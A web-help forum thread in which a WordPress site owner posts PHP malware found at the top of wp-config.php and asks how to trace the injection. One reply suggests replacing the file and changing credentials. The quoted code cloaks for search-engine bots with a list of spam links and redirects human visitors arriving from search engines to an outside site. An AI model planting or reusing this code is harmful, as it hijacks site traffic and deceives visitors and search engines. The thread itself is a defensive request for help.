I have the code being injected into one of my sites. I can't find the culprit. I downloaded the site with BackupBuddy, and it showed the injected code, which is the following:
<?php
$referer = $_SERVER['HTTP_REFERER'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$tmp = strtolower($_SERVER['HTTP_USER_AGENT']);
if (strpos($tmp, 'google') !== false || strpos($tmp, 'yahoo') !== false || strpos($tmp, 'bing') !== false ||
strpos($tmp, 'aol') !== false || strpos($tmp, 'sqworm') !== false || strpos($tmp, 'bot') !== false) {
cheongsam dress => "http://www.cozyladywear.com/qipao-cheongsam-c-87.html",
cheongsam dresses => "http://www.goodorient.com/Dresses_C115",
cheongsam style dress => "https://www.pinterest.com/explore/cheongsam-modern/",
cheongsam dress pattern => "http://www.japanesesewingbooks.com/2014/01/13/free-girls-qi-pao-chinese-dress-pattern-and-sew-along/",
dress cheongsam => "http://www.japanesesewingbooks.com/2014/01/13/free-girls-qi-pao-chinese-dress-pattern-and-sew-along/",
cheongsam dresses for sale => "http://modernqipao.com/",
red cheongsam dress => "http://redchinesedress.com/product-category/cheongsam-qipao/",
black cheongsam dress => "https://www.etsy.com/market/black_cheongsam",
cheongsam evening dress => "http://yannyexpress.com/collections/wedding-qipao-cheongsam",
cheongsam dress for sale => "http://www.dresswe.com/cheongsam-dresses-103948/",
short cheongsam dresses => "http://www.elegente.com/short-cheongsam",
cheongsam inspired dresses => "https://www.pinterest.com/friedwontons4u/the-modern-girls-guide-to-cheongsamqipao/",
lace cheongsam dress => "http://modernqipao.com/product-category/material/lace/",
silk cheongsam dress => "http://www.efushop.com/index.php/goods/category/Silk-Brocade-cheongsam",
vintage cheongsam dress => "https://www.etsy.com/market/vintage_cheongsam",
blue cheongsam dress => "http://modernqipao.com/product-tag/blue/",
purple cheongsam dress => "http://modernqipao.com/product-tag/purple-lavender-color/",
white cheongsam dress => "https://www.pinterest.com/explore/cheongsam-wedding/",
cotton cheongsam dress => "http://www.efushop.com/index.php/goods/category/Cotton-cheongsam",
cheongsam dress sewing pattern => "http://vintagepatterns.wikia.com/wiki/Category:Cheongsam",
cheongsam prom dress => "http://www.cozyladywear.com/fuchsia-fishtail-cheongsam-qipao-chinese-wedding-prom-dress-p-611.html",
cheongsam inspired dress => "https://www.etsy.com/market/qipao",
gold cheongsam dress => "http://modernqipao.com/product/gold-circled-lace-modern-mini-qipao-sexy-chinese-cheongsam-dress/",
cheongsam dinner dress => "https://www.pinterest.com/yannyexpress/wedding-qipao-cheongsam-bridal-kwa-qun-couture-eve/",
cheongsam bridesmaid dresses => "https://www.pinterest.com/explore/chinese-wedding-dresses/",
pink cheongsam dress => "http://modernqipao.com/product-tag/pink-peach-champagne/",
cheongsam short dress => "https://www.pinterest.com/cozyladywear/qipao-cheongsam/",
hot cheongsam dress => "http://www.idreammart.com/chinese-dresses/2015-hot-cheongsam-chinese-dresses.html",
cheongsam dresses uk => "http://www.kaiizhang.co.uk/",
chinese traditional dress => "https://en.wikipedia.org/wiki/Chinese_clothing",
traditional chinese dress => "http://www.travelchinaguide.com/intro/clothing/",
traditional chinese dresses => "http://www.chinatoday.com/culture/qipao/qipao.htm",
chinese dress traditional => "https://en.wikipedia.org/wiki/Cheongsam",
);
exit;
}
//
$from_search_engine = false;
$jump_referer = array('google','bing','yahoo','msn','ask','yandex','aol');
foreach($jump_referer as $ref){
$ref_rst = stripos($referer,$ref);
if($ref_rst > -1){
$from_search_engine=true;
break;
}
}
if($from_search_engine){
header("Location: http://www.acc2buy.com/");
exit;
}
?>
This code is at the very top of wp-config.php - however, when I login via FTP, this code isn't there. So it's redirecting all users that try to come via a search engine.
How would I go about tracking down the actual injection file? I've already GREPped everything, looking for any references to wp-config.php.
I have also started with index.php, and worked my way through wp-blog-head.php and wp-load.php - I can't seem to find where it's being prepended.
Thanks in advance guys!
I have checked your issue, Do one thing just zipped this file as backup and delete the existing file after changing the host,username and password
some times the code is not shown while viewing the code in cpanel so best way is to upload new file after changes and delete old one
Hope you get the solution feel free to ask any malware related query :)